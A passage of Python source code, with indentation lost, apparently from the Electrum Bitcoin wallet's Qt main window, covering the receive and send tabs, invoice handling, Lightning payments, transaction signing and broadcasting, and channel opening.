x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
self.request_list.update_item(key, req)
self.request_list.update()
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
self.invoice_list.update()
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
